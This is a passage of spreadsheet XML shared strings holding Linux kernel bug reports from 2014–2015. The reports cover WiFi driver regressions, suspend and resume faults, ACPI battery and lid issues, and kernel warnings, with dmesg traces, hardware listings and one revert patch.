correctly. I've never seen this bug before and doesn't seem to be reproducible.</t>
  </si>
  <si>
    <t>Kernel 3.18-rc5 rtl8821ae doesn't connect to WiFi 5G</t>
  </si>
  <si>
    <t>3.18-rc5</t>
  </si>
  <si>
    <t>2014-11-23 21:33 UTC</t>
  </si>
  <si>
    <t>Valerio</t>
  </si>
  <si>
    <t>2014-11-25 16:16 UTC</t>
  </si>
  <si>
    <t>Dear Developers, I have tested kernel 3.18-rc5 with the intent to try the improvements done since the driver left the staging section, but with much surprise I found it can't see my WiFi-5G connection anymore: it can only connect to the standard 2,4G signal. The same driver used to work quite well since kernel 3.14.0 up to 3.17.4. Best regards Valerio</t>
  </si>
  <si>
    <t>[BISECTED]Intel turbo boost broken after resume from suspend.</t>
  </si>
  <si>
    <t>3.17.3+ and 3.18-rc*</t>
  </si>
  <si>
    <t>2014-11-24 20:18 UTC</t>
  </si>
  <si>
    <t>2015-03-31 20:08 UTC</t>
  </si>
  <si>
    <t>Hi, Since kernel release 3.17.3 and for all 3.18-rc releases Intel turbo boost for my Ivy Bridge cpu doesn't work after resume from suspend. After several test I found out, that reverting commit c034871712730a33e0267095f48b62eae958499c solved my issue.</t>
  </si>
  <si>
    <t>iwlwifi: dvm: NMI_WDG since "drop non VO frames when flushing" - MWG100223326</t>
  </si>
  <si>
    <t>3.17.3</t>
  </si>
  <si>
    <t>2014-11-27 21:06 UTC</t>
  </si>
  <si>
    <t>2014-12-01 19:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 158991 [details] dmesg OS: Archlinux x86_64 Notebook: Lenovo Thinkpad T510 Wireless: 03:00.0 Network controller: Intel Corporation WiMAX/WiFi Link 5150 Subsystem: Intel Corporation WiMAX/WiFi Link 5150 ABG Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 28 Region 0: Memory at f8100000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;access denied&gt; Kernel driver in use: iwlwifi Kernel modules: iwlwifi Affected kernel: 3.17.3, 3.17.4 The wireless has become unstable after upgrade kernel to 3.17.3. Dmesg fills with "Microcode SW error detected. Restarting 0x2000000.". I have successfully used Archlinux on this notebook last three years, so it is definitely not a firmware problem. The culprit is the commit below. commit 989d3425e2b1ecf7f24635faa09f13d8a6e90085 Author: Emmanuel Grumbach &lt;emmanuel.grumbach@intel.com&gt; Date: Sun Oct 5 09:11:14 2014 +0300 iwlwifi: dvm: drop non VO frames when flushing commit a0855054e59b0c5b2b00237fdb5147f7bcc18efb upstream. After reverting this, the wireless is working properly again. Seems I'm not alone in facing this problem: https://bugzilla.kernel.org/show_bug.cgi?id=56581#c148</t>
  </si>
  <si>
    <t>iwlwifi dvm: WARNING - reg_process_hint: net/wireless/reg.c:1806 - MWG100223400</t>
  </si>
  <si>
    <t>3.17.4-1-ARCH</t>
  </si>
  <si>
    <t>2014-11-28 16:32 UTC</t>
  </si>
  <si>
    <t>AS</t>
  </si>
  <si>
    <t>2014-12-12 12:43 UTC</t>
  </si>
  <si>
    <t>Created attachment 159021 [details] dmesg log of error When I connect to a wireless network, I get a crash on the iwlwifi module almost every time. This also happens irregularly while I'm already connected to a wireless LAN. Additionally I sometimes get "fail to flush tx queue" errors, but far less frequently. Latter error seems to be the same as reported here: https://bugzilla.kernel.org/show_bug.cgi?id=56581 Every time 1 second before the crash, this line gets logged: cfg80211: Calling CRDA for country: DE Not sure if that's related. I'm using a Thinkpad x220 with an "Intel Corporation Centrino Advanced-N 6205" wireless controller. There is also an entry on the Arch Linux bugtracker with additional logs and information: https://bugs.archlinux.org/task/41906</t>
  </si>
  <si>
    <t>Laptop Lid status (/proc/acpi/button/lid/LID0/state) on MS Surface Pro 1 remains on "closed" after first use.</t>
  </si>
  <si>
    <t>3.16.0-4-amd64</t>
  </si>
  <si>
    <t>2014-12-03 16:35 UTC</t>
  </si>
  <si>
    <t>GiH</t>
  </si>
  <si>
    <t>2016-08-24 09:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 159571 [details] dmesg Hi, I use a MS Surface Pro with Debian Jessie on it. ;-) At start a status of /proc/acpi/button/lid/LID0/state is "open", but after first use it changes to "closed" and remains on this status until reboot. I have tested it with Debian Wheezy, Debian Jessie, Fedora 20, Fedora 21 and Ubuntu 14.10. All of them have the same behaviour. /proc/acpi/button/lid/LID0/state remains on "closed". The most annoying thing is, that the notebook suspends after ca. 20 seconds after wake up. Just reboot helps. My suggestion is: A bug in button mod. It recognize a closing of lid but not the opening.</t>
  </si>
  <si>
    <t>[PATCH]mac80211: multicast adds to rx-led and is not counted</t>
  </si>
  <si>
    <t>3.17.4</t>
  </si>
  <si>
    <t>2014-12-08 05:43 UTC</t>
  </si>
  <si>
    <t>2014-12-12 11:13 UTC</t>
  </si>
  <si>
    <t>Created attachment 160001 [details] patch "mac80211: fix use-after-free in defragmentation" (b8fff407a180286aa683d543d878d98d9fc57b13) introduced two little bugs. As multicast-frames are never fragmented, "dot11MulticastReceivedFrameCount" would never be incremented. Furthermore, the RX-LED will be triggered by every multicast frame (which wouldn't happen before) which wouldn't allow my LED to rest at all. I hope the appended patch and original commit message allows to clarify that.</t>
  </si>
  <si>
    <t>[BDW|Regression][Audio][ADSP Analog]:Can't detect sound card</t>
  </si>
  <si>
    <t>3.18.0</t>
  </si>
  <si>
    <t>2014-12-10 01:20 UTC</t>
  </si>
  <si>
    <t>2015-01-13 07:33 UTC</t>
  </si>
  <si>
    <t>Keyon</t>
  </si>
  <si>
    <t>iwlwifi 7260: firmware crashes repeatedly on AC network</t>
  </si>
  <si>
    <t>3.17.6-1-ARCH</t>
  </si>
  <si>
    <t>2014-12-14 18:44 UTC</t>
  </si>
  <si>
    <t>Sebastian Jug</t>
  </si>
  <si>
    <t>2015-01-12 06:05 UTC</t>
  </si>
  <si>
    <t>Created attachment 160571 [details] dmesg Hello there, Right now I am running a stock Arch linux kernel so I do not have tracing, monitoring or debugfs. That being said I will do whatever I can to help resolve these issues. I have a brand new Lenovo X1 carbon gen 2 and the laptop is totally unusable via wireless network. I initially created a thread on the arch linux forums, but it seems to be a kernel driver issue. lspci | grep Network: 03:00.0 Network controller [0280]: Intel Corporation Wireless 7260 [8086:08b2] (rev 83) lsmod | grep iwlwifi wrote: iwlwifi 156837 1 iwlmvm cfg80211 445286 3 iwlwifi,mac80211,iwlmvm modinfo iwlwifi | grep -e 7260 -e version wrote: version: in-tree: firmware: iwlwifi-7260-9.ucode srcversion: B92D41B0FC64FD1196EE1C3 vermagic: 3.17.6-1-ARCH SMP preempt mod_unload modversions ls -al /lib/firmware/ | grep 7260 wrote: -rw-r--r-- 1 root root 672480 Dec 6 09:23 iwlwifi-7260-10.ucode -rw-r--r-- 1 root root 683236 Dec 6 09:23 iwlwifi-7260-7.ucode -rw-r--r-- 1 root root 679780 Dec 6 09:23 iwlwifi-7260-8.ucode -rw-r--r-- 1 root root 680508 Dec 6 09:23 iwlwifi-7260-9.ucode I've attached an excellent dmesg that demonstrates several issues that the driver/card is having: -Deauthentication due to Reason 15=4WAY_HANDSHAKE_TIMEOUT, cripples the card on b/g/n though also present on AC. -Ongoing microcode SW errors -The card hangs with "Q X is active and mapped to fifo"</t>
  </si>
  <si>
    <t>Can't register new acpi battery -&gt; No battery life on laptop</t>
  </si>
  <si>
    <t>v3.19-rc1</t>
  </si>
  <si>
    <t>2014-12-21 04:48 UTC</t>
  </si>
  <si>
    <t>Lompik</t>
  </si>
  <si>
    <t>2015-07-22 00:38 UTC</t>
  </si>
  <si>
    <t>Hi, I am running kernel 3.19-rc1 on a "Mircosoft surface 3" .However recent (23 Nov) changes made in the file 'drivers/acpi/battery.c' in the commit 40e7fcb19293cbdff02c74cb0668413480f82ea1 will prevent the battery of my laptop to be registered. the result in that the Battery driver will deferring the Probing of the device forever. Removing the 2 commited lines (1181) fixes the issues in my case and the battery shows up in '/sys/class/power_supply/BAT0'. Regards -- **dmesg: Warning message before patch below : [ 8551.693540] acpi PNP0C0A:00: Driver battery requests probe deferral **dmesg: After the patch only one message is displayed about the battery : [ 0.600055] ACPI: Battery Slot [BAT0] (battery present) Specific patch reverting the commit: diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c index d98ba43..4983b98 100644 --- a/drivers/acpi/battery.c +++ b/drivers/acpi/battery.c @@ -1181,9 +1181,6 @@ static int acpi_battery_add(struct acpi_device *device) if (!device) return -EINVAL; - if (device-&gt;dep_unmet) - return -EPROBE_DEFER; - battery = kzalloc(sizeof(struct acpi_battery), GFP_KERNEL); if (!battery) return -ENOMEM; diff --git a/scripts/depmod.sh b/scripts/depmod.sh index 122599b..9535d73 100755 --- a/scripts/depmod.sh +++ b/scripts/depmod.sh @@ -1,4 +1,5 @@ #!/bin/sh +exit 0 # # A depmod wrapper used by the toplevel Makefile</t>
  </si>
  <si>
    <t>Null pointer dereference in dm_cell_release_no_holder</t>
  </si>
  <si>
    <t>3.18.1</t>
  </si>
  <si>
    <t>2014-12-27 05:10 UTC</t>
  </si>
  <si>
    <t>Kyle Blake</t>
  </si>
  <si>
    <t>2015-01-06 18:50 UTC</t>
  </si>
  <si>
    <t>When lvm2 starts on bootup on my machine, I get a kernel panic due to a null pointer dereference in dm_cell_release_no_holder. I am using dm-cache. This behaviour did not occur in 3.15.5, but did occur in 3.17.4, 3.18.0, and 3.18.1. Call stack: cell_defer cache_map __map_bio __split_and_process_bio dm_request generic_make_request submit_bio do_blockdev_direct_IO I_BDEV blkdev_direct_IO I_BDEV generic_file_read_iter path_openat new_sync_read vfs_read SyS_read system_call_fastpath</t>
  </si>
  <si>
    <t>Intel pstate stops working after resuming from suspend on haswell</t>
  </si>
  <si>
    <t>2014-12-28 13:00 UTC</t>
  </si>
  <si>
    <t>Alex Lochmann</t>
  </si>
  <si>
    <t>2016-03-22 15:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 162021 [details] output of /proc/cpuinfo Hi folks! I'm a little bit desperate. I recently installed Ubuntu 14.10 on a Lenovo X240 with Intel Core-i7 4600U. I built a custom (mainline) kernel. I didn't manage to configure the kernel in the right way to resume frequency scaling after resuming from suspend to ram. The frequency stucks at the maximum available frequency. The concrete value depends on /sys/devices/system/cpu/intel_pstate/no_turbo. If it is 0, it is 3.1 GHz. Besides this issue, i've got some trouble to make the kernel scale a cores frequency. If i boot the kernel as it is, it scales the frequency just down to 2.1 GHz or it even stucks at 3.1 GHz, which is the turbo boost frequency. After i change the values of /sys/kernel/debug/pstate_snb/*_gain_pct from i_gain_pct = 0 d_gain_pct = 0 p_gain_pct = 20 to i_gain_pct = 50 d_gain_pct = 0 p_gain_pct = 0 , things getting better. The average load among all cores is about 25% according to htop. I tested nearly the same kernel config with a 3.18.1 kernel on a old X220 (Intel Core-i3 2300M). It just works... The kernel scales the frequency and resumes its work after wakeup. I attached the output of cpuinfo for the 4600U cpu and the kernel config. Pls, help me. :-) Greetings, Alex</t>
  </si>
  <si>
    <t>Asus t100ta Buttons not working</t>
  </si>
  <si>
    <t>3.19.-rc2</t>
  </si>
  <si>
    <t>2014-12-31 15:23 UTC</t>
  </si>
  <si>
    <t>Brian Loften</t>
  </si>
  <si>
    <t>2015-01-20 08:09 UTC</t>
  </si>
  <si>
    <t>Hello the side buttons for volume on the Asust100 baytrail are not working properly they are being detected by the crystalcove-gpio 265: 0 0 0 0 Crystal Cove 5 gpio_crystalcove 266: 0 0 0 0 Crystal Cove 0 volume_up 267: 0 0 0 0 Crystal Cove 1 volume_down 273: 0 0 0 0 Crystal Cove 7 rotation_lock 274: 0 0 0 0 Crystal Cove 8 home 360: 17 0 however when i push the volune buttons i get the following error message 4089.639205] WARNING: CPU: 2 PID: 72 at kernel/irq/manage.c:661 irq_nested_primary_handler+0x2c/0x30() [ 4089.639216] Primary handler called for nested irq 267 [ 4089.639224] Modules linked in: hci_uart joydev snd_soc_sst_baytrail_pcm asus_nb_wmi gpio_keys asus_wmi hid_generic sparse_keymap snd_soc_sst_dsp snd_soc_sst_byt_rt5640_mach intel_rapl intel_powerclamp coretemp kvm_intel kvm crc32_pclmul brcmfmac aesni_intel xts brcmutil aes_i586 cfg80211 lrw snd_intel_sst_acpi gf128mul i915 ablk_helper snd_soc_rt5640 snd_intel_sst_core cryptd snd_soc_rl6231 snd_soc_sst_mfld_platform snd_soc_core snd_compress drm_kms_helper usbhid snd_pcm_dmaengine snd_seq_midi drm mei_txe i2c_algo_bit lpc_ich hid_multitouch mei snd_pcm iosf_mbi snd_seq_midi_event snd_rawmidi wmi mac_hid 8250_fintek snd_seq soc_button_array int3400_thermal snd_seq_device ak8975 acpi_thermal_rel int3402_thermal processor_thermal_device int3403_thermal video acpi_pad snd_timer industrialio snd soundcore [ 4089.639466] bnep snd_soc_sst_acpi rfkill_gpio rfcomm bluetooth 8250_dw spi_pxa2xx_platform pwm_lpss_platform parport_pc ppdev lp parport nls_iso8859_1 uas usb_storage mmc_block sdhci_acpi sdhci [ 4089.639543] CPU: 2 PID: 72 Comm: irq/67-Crystal Tainted: G W 3.19.0-rc2-next-20141231 #1 [ 4089.639554] Hardware name: ASUSTeK COMPUTER INC. T100TA/T100TA, BIOS T100TA.313 08/13/2014 [ 4089.639564] 00000002 00000000 c24fbdf4 c16e0257 c24fbe38 c24fbe28 c105390c c18ec480 [ 4089.639596] c24fbe54 00000048 c18f8e3b 00000295 c10a60fc 00000295 c10a60fc f4464540 [ 4089.639626] f446459c c278ad40 c24fbe40 c1053974 00000009 c24fbe38 c18ec480 c24fbe54 [ 4089.639656] Call Trace: [ 4089.639685] [&lt;c16e0257&gt;] dump_stack+0x41/0x52 [ 4089.639707] [&lt;c105390c&gt;] warn_slowpath_common+0x8c/0xc0 [ 4089.639727] [&lt;c10a60fc&gt;] ? irq_nested_primary_handler+0x2c/0x30 [ 4089.639744] [&lt;c10a60fc&gt;] ? irq_nested_primary_handler+0x2c/0x30 [ 4089.639763] [&lt;c1053974&gt;] warn_slowpath_fmt+0x34/0x40 [ 4089.639781] [&lt;c10a60fc&gt;] irq_nested_primary_handler+0x2c/0x30 [ 4089.639800] [&lt;c10a5c56&gt;] handle_irq_event_percpu+0x76/0x190 [ 4089.639818] [&lt;c1461570&gt;] ? regmap_format_10_14_write+0x30/0x30 [ 4089.639836] [&lt;c1464f4c&gt;] ? _regmap_bus_raw_write+0x4c/0x70 [ 4089.639854] [&lt;c10a5da1&gt;] handle_irq_event+0x31/0x50 [ 4089.639872] [&lt;c10a83eb&gt;] handle_simple_irq+0x4b/0x70 [ 4089.639889] [&lt;c10a5384&gt;] generic_handle_irq+0x24/0x40 [ 4089.639908] [&lt;c1366d87&gt;] crystalcove_gpio_irq_handler+0xa7/0xc0 [ 4089.639927] [&lt;c10a85a7&gt;] handle_nested_irq+0x77/0x190 [ 4089.639947] [&lt;c1469801&gt;] regmap_irq_thread+0x1b1/0x360 [ 4089.639966] [&lt;c10a6ae8&gt;] irq_thread_fn+0x18/0x30 [ 4089.639983] [&lt;c10a6906&gt;] irq_thread+0xf6/0x110 [ 4089.640001] [&lt;c10a6ad0&gt;] ? irq_finalize_oneshot.part.30+0x1b0/0x1b0 [ 4089.640019] [&lt;c10a6b50&gt;] ? irq_forced_thread_fn+0x50/0x50 [ 4089.640037] [&lt;c10a6810&gt;] ? irq_thread_check_affinity+0xc0/0xc0 [ 4089.640054] [&lt;c106f389&gt;] kthread+0xa9/0xc0 [ 4089.640074] [&lt;c16e6401&gt;] ret_from_kernel_thread+0x21/0x30 [ 4089.640091] [&lt;c106f2e0&gt;] ? kthread_create_on_node+0x110/0x110 [ 4089.640105] ---[ end trace dca7946ad31eba7d ]--- [ 4089.640113] ------------[ cut here ]------------ [ 4089.640131] WARNING: CPU: 2 PID: 72 at kernel/irq/handle.c:147 handle_irq_event_percpu+0x17a/0x190() [ 4089.640147] irq 267 handler irq_nested_primary_handler+0x0/0x30 enabled interrupts [ 4089.640154] Modules linked in: hci_uart joydev snd_soc_sst_baytrail_pcm asus_nb_wmi gpio_keys asus_wmi hid_generic sparse_keymap snd_soc_sst_dsp snd_soc_sst_byt_rt5640_mach intel_rapl intel_powerclamp coretemp kvm_intel kvm crc32_pclmul brcmfmac aesni_intel xts brcmutil aes_i586 cfg80211 lrw snd_intel_sst_acpi gf128mul i915 ablk_helper snd_soc_rt5640 snd_intel_sst_core cryptd snd_soc_rl6231 snd_soc_sst_mfld_platform snd_soc_core snd_compress drm_kms_helper usbhid snd_pcm_dmaengine snd_seq_midi drm mei_txe i2c_algo_bit lpc_ich hid_multitouch mei snd_pcm iosf_mbi snd_seq_midi_event snd_rawmidi wmi mac_hid 8250_fintek snd_seq soc_button_array int3400_thermal snd_seq_device ak8975 acpi_thermal_rel int3402_thermal processor_thermal_device int3403_thermal video acpi_pad snd_timer industrialio snd soundcore [ 4089.640373] bnep snd_soc_sst_acpi rfkill_gpio rfcomm bluetooth 8250_dw spi_pxa2xx_platform pwm_lpss_platform parport_pc ppdev lp parport nls_iso8859_1 uas usb_storage mmc_block sdhci_acpi sdhci [ 4089.640442] CPU: 2 PID: 72 Comm: irq/67-Crystal Tainted: G W 3.19.0-rc2-next-20141231 #1 [ 4089.640452] Hardware name: ASUSTeK COMPUTER INC. T100TA/T100TA, BIOS T100TA.313 08/13/2014 [ 4089.640461] 00000002 00000000 c24fbe0c c16e0257 c24fbe50 c24fbe40 c105390c c18ec3e8 [ 4089.640491] c24fbe6c 00000048 c18f8e27 00000093 c10a5d5a 00000093 c10a5d5a f4464540 [ 4089.640521] f446459c c278ad40 c24fbe58 c1053974 00000009 c24fbe50 c18ec3e8 c24fbe6c [ 4089.640550] Call Trace: [ 4089.640571] [&lt;c16e0257&gt;] dump_stack+0x41/0x52 [ 4089.640591] [&lt;c105390c&gt;] warn_slowpath_common+0x8c/0xc0 [ 4089.640610] [&lt;c10a5d5a&gt;] ? handle_irq_event_percpu+0x17a/0x190 [ 4089.640627] [&lt;c10a5d5a&gt;] ? handle_irq_event_percpu+0x17a/0x190 [ 4089.640646] [&lt;c1053974&gt;] warn_slowpath_fmt+0x34/0x40 [ 4089.640664] [&lt;c10a5d5a&gt;] handle_irq_event_percpu+0x17a/0x190 [ 4089.640682] [&lt;c10a60d0&gt;] ? irq_set_irq_wake+0x100/0x100 [ 4089.640700] [&lt;c10a5da1&gt;] handle_irq_event+0x31/0x50 [ 4089.640718] [&lt;c10a83eb&gt;] handle_simple_irq+0x4b/0x70 [ 4089.640735] [&lt;c10a5384&gt;] generic_handle_irq+0x24/0x40 [ 4089.640752] [&lt;c1366d87&gt;] crystalcove_gpio_irq_handler+0xa7/0xc0 [ 4089.640770] [&lt;c10a85a7&gt;] handle_nested_irq+0x77/0x190 [ 4089.640790] [&lt;c1469801&gt;] regmap_irq_thread+0x1b1/0x360 [ 4089.640809] [&lt;c10a6ae8&gt;] irq_thread_fn+0x18/0x30 [ 4089.640826] [&lt;c10a6906&gt;] irq_thread+0xf6/0x110 [ 4089.640844] [&lt;c10a6ad0&gt;] ? irq_finalize_oneshot.part.30+0x1b0/0x1b0 [ 4089.640862] [&lt;c10a6b50&gt;] ? irq_forced_thread_fn+0x50/0x50 [ 4089.640880] [&lt;c10a6810&gt;] ? irq_thread_check_affinity+0xc0/0xc0 [ 4089.640896] [&lt;c106f389&gt;] kthread+0xa9/0xc0 [ 4089.640915] [&lt;c16e6401&gt;] ret_from_kernel_thread+0x21/0x30 [ 4089.640933] [&lt;c106f2e0&gt;] ? kthread_create_on_node+0x110/0x110 [ 4089.640945] ---[ end trace dca7946ad31eba7e ]--- [ 4089.943279] ------------[ cut here ]------------ [ 4089.943320] WARNING: CPU: 2 PID: 72 at kernel/irq/manage.c:661 irq_nested_primary_handler+0x2c/0x30() [ 4089.943331] Primary handler called for nested irq 267 [ 4089.943340] Modules linked in: hci_uart joydev snd_soc_sst_baytrail_pcm asus_nb_wmi gpio_keys asus_wmi hid_generic sparse_keymap snd_soc_sst_dsp snd_soc_sst_byt_rt5640_mach intel_rapl intel_powerclamp coretemp kvm_intel kvm crc32_pclmul brcmfmac aesni_intel xts brcmutil aes_i586 cfg80211 lrw snd_intel_sst_acpi gf128mul i915 ablk_helper snd_soc_rt5640 snd_intel_sst_core cryptd snd_soc_rl6231 snd_soc_sst_mfld_platform snd_soc_core snd_compress drm_kms_helper usbhid snd_pcm_dmaengine snd_seq_midi drm mei_txe i2c_algo_bit lpc_ich hid_multitouch mei snd_pcm iosf_mbi snd_seq_midi_event snd_rawmidi wmi mac_hid 8250_fintek snd_seq soc_button_array int3400_thermal snd_seq_device ak8975 acpi_thermal_rel int3402_thermal processor_thermal_device int3403_thermal video acpi_pad snd_timer industrialio snd soundcore [ 4089.943580] bnep snd_soc_sst_acpi rfkill_gpio rfcomm bluetooth 8250_dw spi_pxa2xx_platform pwm_lpss_platform parport_pc ppdev lp parport nls_iso8859_1 uas usb_storage mmc_block sdhci_acpi sdhci [ 4089.943657] CPU: 2 PID: 72 Comm: irq/67-Crystal Tainted: G W 3.19.0-rc2-next-20141231 #1 [ 4089.943668] Hardware name: ASUSTeK COMPUTER INC. T100TA/T100TA, BIOS T100TA.313 08/13/2014 [ 4089.943678] 00000002 00000000 c24fbdf4 c16e0257 c24fbe38 c24fbe28 c105390c c18ec480 [ 4089.943710] c24fbe54 00000048 c18f8e3b 00000295 c10a60fc 00000295 c10a60fc f4464540 [ 4089.943740] f446459c c278ad40 c24fbe40 c1053974 00000009 c24fbe38 c18ec480 c24fbe54 [ 4089.943770] Call Trace: [ 4089.943799] [&lt;c16e0257&gt;] dump_stack+0x41/0x52 [ 4089.943821] [&lt;c105390c&gt;] warn_slowpath_common+0x8c/0xc0 [ 4089.943842] [&lt;c10a60fc&gt;] ? irq_nested_primary_handler+0x2c/0x30 [ 4089.943859] [&lt;c10a60fc&gt;] ? irq_nested_primary_handler+0x2c/0x30 [ 4089.943878] [&lt;c1053974&gt;] warn_slowpath_fmt+0x34/0x40 [ 4089.943896] [&lt;c10a60fc&gt;] irq_nested_primary_handler+0x2c/0x30 [ 4089.943914] [&lt;c10a5c56&gt;] handle_irq_event_percpu+0x76/0x190 [ 4089.943933] [&lt;c1461570&gt;] ? regmap_format_10_14_write+0x30/0x30 [ 4089.943951] [&lt;c1464f4c&gt;] ? _regmap_bus_raw_write+0x4c/0x70 [ 4089.943969] [&lt;c10a5da1&gt;] handle_irq_event+0x31/0x50 [ 4089.943987] [&lt;c10a83eb&gt;] handle_simple_irq+0x4b/0x70 [ 4089.944005] [&lt;c10a5384&gt;] generic_handle_irq+0x24/0x40 [ 4089.944024] [&lt;c1366d87&gt;] crystalcove_gpio_irq_handler+0xa7/0xc0 [ 4089.944042] [&lt;c10a85a7&gt;] handle_nested_irq+0x77/0x190 [ 4089.944062] [&lt;c1469801&gt;] regmap_irq_thread+0x1b1/0x360 [ 4089.944081] [&lt;c10a6ae8&gt;] irq_thread_fn+0x18/0x30 [ 4089.944098] [&lt;c10a6906&gt;] irq_thread+0xf6/0x110 [ 4089.944116] [&lt;c10a6ad0&gt;] ? irq_finalize_oneshot.part.30+0x1b0/0x1b0 [ 4089.944134] [&lt;c10a6b50&gt;] ? irq_forced_thread_fn+0x50/0x50 [ 4089.944152] [&lt;c10a6810&gt;] ? irq_thread_check_affinity+0xc0/0xc0 [ 4089.944170] [&lt;c106f389&gt;] kthread+0xa9/0xc0 [ 4089.944190] [&lt;c16e6401&gt;] ret_from_kernel_thread+0x21/0x30 [ 4089.944207] [&lt;c106f2e0&gt;] ? kthread_create_on_node+0x110/0x110 [ 4089.944221] ---[ end trace dca7946ad31eba7f ]--- perhaps the pins need to be assigned the correct values?? Thank you</t>
  </si>
  <si>
    <t>Suspend not working with second core, disabling and re-enabling second core crashes system</t>
  </si>
  <si>
    <t>3.2.65-1</t>
  </si>
  <si>
    <t>2015-01-15 02:34 UTC</t>
  </si>
  <si>
    <t>jan0michael</t>
  </si>
  <si>
    <t>2015-01-29 06:04 UTC</t>
  </si>
  <si>
    <t>For the last days hibernate was broken (reboot after about three seconds after clicking the button, Debian Wheezy 7.8 with Gnome). Hibernate works, if I call echo 0 &gt; /sys/devices/system/cpu/cpu1/online If I then call echo 1 &gt; /sys/devices/system/cpu/cpu1/online the system crashes (immediate reboot), no matter if the system was hibernated after the "echo 0..." or not. Because hibernate is broken for a few days now, I suppose the update from kernel package 3.2.63-2+deb7u2 to 3.2.65-1 broke the hibernate function. More system info: cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 35 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 3800+ stepping : 2 microcode : 0x4d cpu MHz : 1000.000 cache size : 512 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt lm 3dnowext 3dnow rep_good nopl pni lahf_lm cmp_legacy bogomips : 2010.31 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp processor : 1 vendor_id : AuthenticAMD cpu family : 15 model : 35 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 3800+ stepping : 2 microcode : 0x4d cpu MHz : 1000.000 cache size : 512 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt lm 3dnowext 3dnow rep_good nopl pni lahf_lm cmp_legacy bogomips : 2010.31 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical, 48 bits virtual power management: ts fid vid ttp Mainboard: GA-K8N Pro-SLI, Firmware F6</t>
  </si>
  <si>
    <t>After suspend to ram fan spinns always at full speed</t>
  </si>
  <si>
    <t>2015-01-16 11:57 UTC</t>
  </si>
  <si>
    <t>2016-01-25 02:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 163591 [details] dmesg after resume from supend to ram Hello, after suspend to ram the fan of my HP NW9440 spinns always at full speed. Last known good version: 3.17.7 First known bad version: 3.18.0 Last known bad version: 3.18.2 Behaviour: After supend to ram fan spinns at full speed Expected behaviour: Fan speed should be picked according to the current cpu and gpu temperatures. Steps to reproduce: Suspend to ram and then resume.</t>
  </si>
  <si>
    <t>WD 2TB Caviar black causes hard lock on resume S2RAM</t>
  </si>
  <si>
    <t>3.13.7 to 4.0.5</t>
  </si>
  <si>
    <t>2015-01-23 16:06 UTC</t>
  </si>
  <si>
    <t>Dragon32</t>
  </si>
  <si>
    <t>2015-07-22 00:25 UTC</t>
  </si>
  <si>
    <t>Hi, I currently have an issue where a pair of WD 2TB caviar black HDDs are causing a hard crash on resume from S2RAM. I initially thought the issue was down to an Nvidia driver problems but subsequent investigations narrowed the troublesome hardware down to a pair of WD drives in my system. The models are: WD2003FZEX-00Z4SA0 and WD2002FAEX-0 The setup worked with OS 13.1 + K3.11 and successfully resumed from ram Please note both these drives are NTFS, do NOT support APM (which I think is the issue) and I boot legacy BIOS (to lazy to do UEFI). To give some history, please see my initial posting on the Opensuse bugzilla: "I recently experimented with kernel 3.18 on opensuse 13.1 but that resulted in a resume failure on S2RAM, see here for posting: https://forums.opensuse.org/showthread.php/503846-Failure-to-resume-from-Suspend-to-RAM-Kernel-3-18-1-1-1-g5f2f35e-on-OS-13-1-x64 Oh well I thought time to move onto 13.2 however this now exhibits the same behaviour as 13.1 + 3.18 kernel (13.1 + 3.11 kernel OK) in that it will not resume from S2RAM and is hard locked so only a reset will do. This was a clean install on a brand new SSD drive with home copied so no cruft left over." For further info and full discussion with opensuse devs please follow the link to the filed opensuse bugreport as it lists the steps at which the culprit was found: https://bugzilla.opensuse.org/show_bug.cgi?id=913105 So far this bug occurs with the following kernels that I have tested : 3.16.6, 3.16.7, 3.18.1, 3.18.3. Kernel 3.11 is currently the last know good kernel, I have not yet tested kernels between 3.11 and 3.16.6 Please advise of any further information required. Thanks</t>
  </si>
  <si>
    <t>Géza Búza</t>
  </si>
  <si>
    <t>iwlwifi: 7260: WiFi connected but no data transferred after rekeying  - MWG100235318</t>
  </si>
  <si>
    <t>3.18.5-gentoo</t>
  </si>
  <si>
    <t>2015-02-01 16:02 UTC</t>
  </si>
  <si>
    <t>alexander.wetzel</t>
  </si>
  <si>
    <t>2015-05-31 06:11 UTC</t>
  </si>
  <si>
    <t>Created attachment 165521 [details] Wifi capture from monitor station I've a problem with the iwlwifi driver (or probably firmware) on my Thinkpad W530 with an Ultimate-N 6300 Wifi card. During normal operation the network freezes sometimes but is claiming to be still connected. It seems to be possible to reproduce the issue by transfering huge anounts of data. Using Bug #42978 as a guidance I've gathered all the evidence I could get my hands on. Problem description: During opertation the wireless network connection stops working, and a bit later the arp entry for the wlan router times out on the wlan client running iwlwifi. There is nothing suspicious in dmesg/syslog around the time and the only indication from the syslog is, that the ntp server is no longer replying. (Syslog also attached) That can happen during light load (browsing the internet) or while downloading data. The event outlined in detail here was during downloading data from an internal webdav server (owncloud) via davfs2 with ~2.5MiB/s. Tcpdump shows, that the wlan client stops reciving any packets from the wlan router on the tcp/ip level. On the other end the wlan router still sees all packets from the client. (The wlan router is running openwrt and when setting a static arp entry for the gateway arp, icmp echo request and tcp-Syn packets can be seen 